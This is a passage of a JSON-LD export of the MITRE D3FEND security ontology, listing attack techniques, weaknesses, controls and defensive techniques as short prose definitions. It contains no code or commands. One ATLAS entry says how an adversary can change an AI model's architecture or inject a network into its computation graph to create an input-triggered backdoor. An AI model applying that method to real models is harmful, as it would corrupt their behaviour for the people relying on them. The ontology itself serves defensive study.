      "d3f:definition": "Spacecraft typically rely on real-time scheduling, fixed-priority or deadline/periodic schemes, driven by timers, tick sources, and per-task parameters. Threat actors target these parameters and associated tables to skew execution order and timing. Edits may change priorities, periods, or deadlines; adjust CPU budgets and watchdog thresholds; alter ready-queue disciplines; or reconfigure timer tick rates and clock sources. They may also modify task affinities, message-queue depths, and interrupt masks so preemption and latency characteristics shift. Small changes can have large effects: high-rate control loops see added jitter, estimator updates miss deadlines, command/telemetry handling starves, or low-priority maintenance tasks monopolize cores due to mis-set periods.  Manipulated schedules can create intermittent, state-dependent malfunctions that are hard to distinguish from environmental load. The essence of the technique is to weaponize time, reshaping when work happens so that otherwise correct code produces unsafe or exploitable behavior.",
      "rdfs:label": "Scheduling Algorithm - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Scheduling Algorithm"
    },
    {
      "@id": "d3f:has-participant",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-participant y: The event x involves an object y as a participant, indicating that y plays some role in the event, whether actively, passively, or otherwise.",
      "owl:inverseOf": {
        "@id": "d3f:participates-in"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000057"
      },
      "rdfs:label": "has-participant",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-NIST-SP-800-53-R5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf"
      },
      "d3f:kb-abstract": "This publication provides a catalog of security and privacy controls for information systems and organizations to protect organizational operations and assets, individuals, other organizations, and the Nation from a diverse set of threats and risks, including hostile attacks, human errors, natural disasters, structural failures, foreign intelligence entities, and privacy risks. The controls are flexible and customizable and implemented as part of an organization-wide process to manage risk. The controls address diverse requirements derived from mission and business needs, laws, executive orders, directives, regulations, policies, standards, and guidelines. Finally, the consolidated control catalog addresses security and privacy from a functionality perspective (i.e., the strength of functions and mechanisms provided by the controls) and from an assurance perspective (i.e., the measure of confidence in the security or privacy capability provided by the controls). Addressing functionality and assurance helps to ensure that information technology products and the systems that rely on those products are sufficiently trustworthy",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:PhysicalAccessMonitoring"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-53 Revision 5: Security and Privacy Controls for Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-53 Revision 5: Security and Privacy Controls for Information Systems and Organizations"
    },
    {
      "@id": "d3f:CCI-002385_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects against or limits the effects of organization-defined types of denial of service attacks by employing organization-defined security safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002385"
    },
    {
      "@id": "d3f:DHCPNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "DHCP Network Traffic is network traffic related to the DHCP protocol, used by network nodes to negotiate and configure either IPv4 or IPv6 addresses.",
      "rdfs:label": "DHCP Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1623",
      "@type": "owl:Class",
      "d3f:attack-id": "T1623",
      "d3f:definition": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s `Runtime` package.",
      "rdfs:label": "Command and Scripting Interpreter - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExecutionTechnique"
      },
      "skos:prefLabel": "Command and Scripting Interpreter"
    },
    {
      "@id": "d3f:DifferentialVolumeSnapshot",
      "@type": "owl:Class",
      "d3f:definition": "A differential volume snapshot is a point-in-time capture of the files and directories that were changed since the last full snapshot.",
      "rdfs:label": "Differential Volume Snapshot",
      "rdfs:seeAlso": {
        "@id": "https://aws.amazon.com/compare/the-difference-between-incremental-differential-and-other-backups/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:VolumeSnapshot"
      }
    },
    {
      "@id": "d3f:AtomicClock",
      "@type": "owl:Class",
      "d3f:definition": "An atomic clock is a clock that measures time by monitoring the resonant frequency of atoms.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Atomic_clock"
      },
      "rdfs:label": "Atomic Clock",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:CWE-1125",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1125",
      "d3f:definition": "The product has an attack surface whose quantitative measurement exceeds a desirable maximum.",
      "rdfs:label": "Excessive Attack Surface",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:DiskErasure",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskErasure"
      ],
      "d3f:d3fend-id": "D3-DKE",
      "d3f:definition": "Disk Erasure is the process of securely deleting all data on a disk to ensure that it cannot be recovered by any means.",
      "d3f:erases": {
        "@id": "d3f:SecondaryStorage"
      },
      "d3f:kb-article": "### How it works\n\nDisk Erasure involves overwriting the existing data with random or specific patterns multiple times. Disk erasure is crucial for data sanitization, ensuring that sensitive information is completely removed from storage devices before they are repurposed, disposed of, or transferred to another party.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices"
      },
      "rdfs:label": "Disk Erasure",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiskFormatting"
        },
        {
          "@id": "_:N5c5824ec54d64a5bbaa451785eb58737"
        }
      ]
    },
    {
      "@id": "_:N5c5824ec54d64a5bbaa451785eb58737",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:erases"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "rdfs:label": "CM-5"
    },
    {
      "@id": "d3f:T1490",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1490",
      "d3f:definition": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.",
      "d3f:modifies": [
        {
          "@id": "d3f:OperatingSystemConfiguration"
        },
        {
          "@id": "d3f:SystemServiceSoftware"
        }
      ],
      "rdfs:label": "Inhibit System Recovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImpactTechnique"
        },
        {
          "@id": "_:N92351551c00743008d1fe581c3c5b28f"
        },
        {
          "@id": "_:Nceac9c8eadd24dbab5c86eef80515c69"
        }
      ]
    },
    {
      "@id": "_:N92351551c00743008d1fe581c3c5b28f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfiguration"
      }
    },
    {
      "@id": "_:Nceac9c8eadd24dbab5c86eef80515c69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemServiceSoftware"
      }
    },
    {
      "@id": "d3f:PythonScriptFile",
      "@type": "owl:Class",
      "d3f:synonym": "A script file written in the Python programming language.",
      "rdfs:label": "Python Script File",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:CWE-555",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-555",
      "d3f:definition": "The J2EE application stores a plaintext password in a configuration file.",
      "rdfs:label": "J2EE Misconfiguration: Plaintext Password in Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-260"
      }
    },
    {
      "@id": "d3f:CWE-804",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-804",
      "d3f:definition": "The product uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.",
      "rdfs:label": "Guessable CAPTCHA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-863"
        }
      ]
    },
    {
      "@id": "d3f:SourceCodeHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-SCH",
      "d3f:definition": "Hardening source code with the intention of making it more difficult to exploit and less error prone.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "rdfs:label": "Source Code Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Ne49e9250c6f347bb9544764b8ddb52dd"
        }
      ]
    },
    {
      "@id": "_:Ne49e9250c6f347bb9544764b8ddb52dd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:T1223",
      "@type": "owl:Class",
      "d3f:attack-id": "T1223",
      "d3f:definition": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.001",
      "rdfs:label": "Compiled HTML File",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-357",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-357",
      "d3f:definition": "The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention.",
      "rdfs:label": "Insufficient UI Warning of Dangerous Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CCI-001200_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information at rest unless otherwise protected by alternative physical measures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001200"
    },
    {
      "@id": "d3f:InboundInternetEncryptedTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Inbound  internet encrypted traffic is encrypted network traffic on an incoming connection initiated from a host outside the network to a host within a network .",
      "rdfs:label": "Inbound Internet Encrypted Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:DigitalSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital system is a group of interacting or interrelated digital artifacts that act according to a set of rules to form a unified whole. A digital system, surrounded and influenced by its environment, is described by its boundaries, structure and purpose and expressed in its functioning. Systems are the subjects of study of systems theory.",
      "rdfs:label": "Digital System",
      "rdfs:seeAlso": {
        "@id": "dbr:System"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "d3f:System"
        }
      ]
    },
    {
      "@id": "d3f:counters",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "counters",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter"
      }
    },
    {
      "@id": "d3f:SpearmansRankCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SRCC",
      "d3f:synonym": "Spearman's Rho",
      "rdfs:label": "Spearman's Rank Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:ContainerOrchestrationSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A d3f:Software which manages and coordinates running one or more d3f:ContainerProcess.",
      "d3f:manages": {
        "@id": "d3f:ContainerProcess"
      },
      "rdfs:label": "Container Orchestration Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N28524ffaaf694671b0ed8e21e8a25a5b"
        }
      ]
    },
    {
      "@id": "_:N28524ffaaf694671b0ed8e21e8a25a5b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerProcess"
      }
    },
    {
      "@id": "d3f:LinuxOpenAt2ArgumentO_RDONLY-O_WRONLY-O_RDWR",
      "@type": "owl:Class",
      "d3f:definition": "Extension of Linux Openat.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat2.2.html"
      },
      "rdfs:label": "Linux OpenAt2 Argument O_RDONLY, O_WRONLY, O_RDWR",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:CWE-421",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-421",
      "d3f:definition": "The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors.",
      "rdfs:label": "Race Condition During Access to Alternate Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-362"
        },
        {
          "@id": "d3f:CWE-420"
        }
      ]
    },
    {
      "@id": "d3f:T0880",
      "@type": "owl:Class",
      "d3f:attack-id": "T0880",
      "d3f:definition": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner.",
      "rdfs:label": "Loss of Safety - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Safety"
    },
    {
      "@id": "d3f:CWE-775",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-775",
      "d3f:definition": "The product does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed.",
      "rdfs:label": "Missing Release of File Descriptor or Handle after Effective Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-772"
      }
    },
    {
      "@id": "d3f:Pix2Pix",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PIX",
      "d3f:definition": "Pix2Pix is based on condtional GAN architecture and are trained on paired set of images or scenes from two domains to be used for translation.",
      "d3f:kb-article": "## References\nEsri. (n.d.). How Pix2Pix Works. [Link](https://developers.arcgis.com/python/guide/how-pix2pix-works/)",
      "rdfs:label": "Pix2Pix",
      "rdfs:subClassOf": {
        "@id": "d3f:Image-to-ImageTranslationGAN"
      }
    },
    {
      "@id": "d3f:DS0023",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it",
      "d3f:exactly": {
        "@id": "d3f:NamedPipe"
      },
      "rdfs:label": "Named Pipe (ATT&CK DS)"
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-37-Revision-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-37r2"
      },
      "d3f:kb-abstract": "This publication describes the Risk Management Framework (RMF) and provides guidelines for applying the RMF to information systems and organizations. The RMF provides a disciplined, structured, and flexible process for managing security and privacy risk that includes information security categorization; control selection, implementation, and assessment; system and common control authorizations; and continuous monitoring. The RMF includes activities to prepare organizations to execute the framework at appropriate risk management levels. The RMF also promotes near real-time risk management and ongoing information system and common control authorization through the implementation of continuous monitoring processes; provides senior leaders and executives with the necessary information to make efficient, cost-effective, risk management decisions about the systems supporting their missions and business functions; and incorporates security and privacy into the system development life cycle. Executing the RMF tasks links essential risk management processes at the system level to risk management processes at the organization level. In addition, it establishes responsibility and accountability for the controls implemented within an organization’s information systems and inherited by those systems.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations"
    },
    {
      "@id": "d3f:CWE-697",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-697",
      "d3f:definition": "The product compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses.",
      "rdfs:label": "Incorrect Comparison",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:Reference-LibreNMSDocsNetworkMapExtension",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.librenms.org/Extensions/Network-Map/"
      },
      "d3f:kb-abstract": "LibreNMS has the ability to show you a network map based on:\n* xDP Discovery\n* MAC addresses",
      "d3f:kb-organization": "LibreNMS.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkMapping"
      },
      "d3f:kb-reference-title": "Libre NMS - Network Map Extension",
      "rdfs:label": "Reference - Libre NMS - Network Map Extension"
    },
    {
      "@id": "d3f:CWE-495",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-495",
      "d3f:definition": "The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways.",
      "rdfs:label": "Private Data Structure Returned From A Public Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-000195_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for password-based authentication, when new passwords are created, enforces that at least an organization-defined number of characters are changed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000195"
    },
    {
      "@id": "d3f:CWE-77",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-77",
      "d3f:definition": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.",
      "d3f:synonym": "Command injection",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Neutralization of Special Elements used in a Command ('Command Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-74"
        },
        {
          "@id": "_:N59c53ad43ecd4b8da6b58e778b402a51"
        }
      ]
    },
    {
      "@id": "_:N59c53ad43ecd4b8da6b58e778b402a51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:Classification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CLA",
      "d3f:definition": "Classification uses an algorithm to accurately assign test data into specific categories.",
      "d3f:kb-article": "## How it works\nClassification recognizes specific entities within the dataset and attempts to draw some conclusions on how those entities should be labeled or defined. Common classification algorithms are linear classifiers, support vector machines (SVM), decision trees, k-nearest neighbor, and random forest, which are described in more detail below.\n\n## Considerations:\n\nThere are many different types of classification algorithms for modeling classification predictive modeling problems.\n\nThere is no single theory on how to map algorithms onto problem types; instead, it is generally recommended that a practitioner use controlled experiments and discover which algorithm and algorithm configuration results in the best performance for a given classification task.\n\n## Key Test Considerations\n\n- **Machine Learning**:\n\n  - **Verify the dataset quality**: Check the data to make sure it is\n      free of errors.  Quantify the degree of missing values,\n      outliers, and noise in the data collection.  If the data quality\n      is low, it may be difficult or impossible to create models and\n      systems with the desired performance.\n\n  - **Verify development datasets are representative** of expected\n      operational environment and data collection means.  Compare\n      distributions of dataset features and labels with exploratory\n      data analysis and assess the difference in tests on training\n      data and tests on evaluation data (where the evaluation data\n      must be drawn from a representative dataset.)\n\n  - **Use software libraries**: and tools built for ML where possible, so\n      that the underlying code is verified by prior use.**\n\n  - **Diagnose model errors with domain SMEs**: Have problem domain\n    SMEs investigate model errors for conditions for which the model\n    may underperform and suggest refinements.\n\n- **Classification**:\n\n  - **Use Standard Classification Performance Measures**: Not all of\n      the following may be necessary, but should be considered for\n      both verification (developmental test) and operational test\n      stages use:\n\n    - **Accuracy**: The fraction of predictions that were corret.\n\n    - **Precision**: The proportion of positive identifications that were correct.\n\n    - **Recall**: The proportion of actual positive cases identified correctly.\n\n    - **F-Measure**: Combines the preicion and recall into a single\n        score.  It is the harmonic mean of the precision and recall.\n\n    - **Receiver Operating Characteristic (ROC) Curve**: A ROC curve\n        shows the performance of a classification model at all\n        classification thresholds.  It graphs the True Positive Rate\n        over the False Positive Rate.\n\n    - **Area Under the ROC Curve (AUC)**: This measures the\n        two-dimensional area under the ROC Curve.  AUC is\n        scale-invariant and classification-threshold invariant.\n\n    - **ROC TP vs FP points**: In addition to a specific AUC score,\n        the performance at points\n\n    - **Confusion Matrix**: A confusion matrix is a table layout that\n        allows the visualization of the performance of an\n        algorithm. Each row of the matrix represents the instances in\n        an actual class while each column represents the instances in\n        a predicted class, or vice versa. It is a special kind of\n        contingency table, with two dimensions (\"actual\" and\n        \"predicted\"), and identical sets of \"classes\" in both\n        dimensions (each combination of dimension and class is a\n        variable in the contingency table.)\n\n  - **Prediction Bias**: The difference between the average of the\n      predicted labels and the average of the labels in the data\n      set.  One should check for prediction bias when evaluating the\n      classifier's results. Causes of bias can include:\n\n    - **Noisy data set**: Errors in original data can as the\n      collection method may have an underlying bias.\n\n    - **Processing bug**: Errors in the data pipeline can\n      introduce bias.\n\n    - **Biased training sample (unbalanced samples)**: Model\n      parameters may be skewed towards majority classes.\n\n\t- **Overly strong regularization**: Model may be underfitting\n        model and too simple.\n\n\t- **Proxy variables**: Model features may be highly\n        correlated.\n\n  - **Overfitting and Underfitting**: Overfitting occurs when the the\n    model built corresponds too closely or exactly to a particular\n    set of data, and thus may fail to fit to predict additional data\n    reliably. An overfitted model is a mathematical model that\n    contains more parameters than can be justified by the data.\n    Underfitting occurs when the model built does adequately capture\n    the patterns in the data. As an example, a linear model will\n    underfit a non-linear dataset.\n\n## Platforms, Tools, or Libraries:\n\n- **Python**:\n\n  - **scikit-learn**: Is a free software machine learning library for\n      Python and includes features for classification.\n\n  - **TensorFlow**: is an end-to-end source machine learning\n    platform.\n\n  - **Keras**: is an open-source library that provides a Python API\n    designed to enable fast experimentation with deep neural networks.\n\n  - **PyTorch**: Is a machine learning framework based on the Torch\n    library.\n\n- **R**:\n\n  - **caret**: Classification And REgression Training package contains\n      functions to streamline model training for complex regression\n      and classification problems.\n\n  - **randomForest**: Implementation of classification and regression\n      based on forest of trees.\n\n## References\n\n1. Supervised Learning. IBM.\n[Link](https://www.ibm.com/topics/supervised-learning).\n\n1. Types of Classification in Machine Learning. Machine Learning Mastery.\n[Link](https://machinelearningmastery.com/types-of-classification-in-machine-learning/).\n\n1. Google. (18 July 2022). Classification: Precision and Recall.\n[Link](https://developers.google.com/machine-learning/crash-course/classification/precision-and-recall).\n\n1. Wikipedia. (18 Aug 2023). Overfitting.\n[Link](https://en.wikipedia.org/wiki/Overfitting).\n\n1. Wikipedia. (19 Aug 2023). Confusion matrix.\n[Link](https://en.wikipedia.org/wiki/Confusion_matrix).",
      "rdfs:label": "Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:SupervisedLearning"
      }
    },
    {
      "@id": "d3f:T1596.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.003",
      "d3f:definition": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.",
      "rdfs:label": "Digital Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:AML.T0018.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018.001",
      "d3f:definition": "Adversaries may directly modify an AI model's architecture to re-define it's behavior. This can include adding or removing layers as well as adding pre or post-processing operations.\n\nThe effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.",
      "rdfs:label": "Modify AI Model Architecture - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0018"
      },
      "skos:prefLabel": "Modify AI Model Architecture"
    },
    {
      "@id": "d3f:DecoyPersona",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyPersona"
      ],
      "d3f:d3fend-id": "D3-DP",
      "d3f:definition": "Establishing a fake online identity to misdirect, deceive, and or interact with adversaries.",
      "d3f:kb-article": "## How it works\nA false online identity is created for the purposes of interacting with adversaries in a direct or indirect manner. This includes the associated email addresses, social media accounts, and other online communication profiles.\n\n## Considerations\n* Include phone numbers and online social profiles as well as automatically or manually responding to contact made to the persona to improve realism.\n* Continuous updating and managing the decoy personas and online activity streams to ensure personas do not become stale and outdated.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DecoyPersonasForSafeguardingOnlineIdentityUsingDeception_"
        },
        {
          "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_Cymmetria,Inc."
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:User"
      },
      "rdfs:label": "Decoy Persona",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Nffe69843e93b409a9a886274670a9a49"
        }
      ]
    },
    {
      "@id": "_:Nffe69843e93b409a9a886274670a9a49",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:User"
      }
    },
    {
      "@id": "d3f:CWE-40",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-40",
      "d3f:definition": "The product accepts input that identifies a Windows UNC share ('\\\\UNC\\share\\name') that potentially redirects access to an unintended location or arbitrary file.",
      "rdfs:label": "Path Traversal: '\\\\UNC\\share\\name\\' (Windows UNC Share)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-36"
      }
    },
    {
      "@id": "d3f:DatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A single, implicitly structured data item in a table in a database.",
      "rdfs:label": "Database Record",
      "rdfs:seeAlso": "https://dbpedia.org/page/Row_(database)",
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:T1562.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1562.011",
      "d3f:definition": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.",
      "rdfs:label": "Spoof Security Alerting",
      "rdfs:subClassOf": {
        "@id": "d3f:T1562"
      }
    },
    {
      "@id": "d3f:NetworkPrinter",
      "@type": "owl:Class",
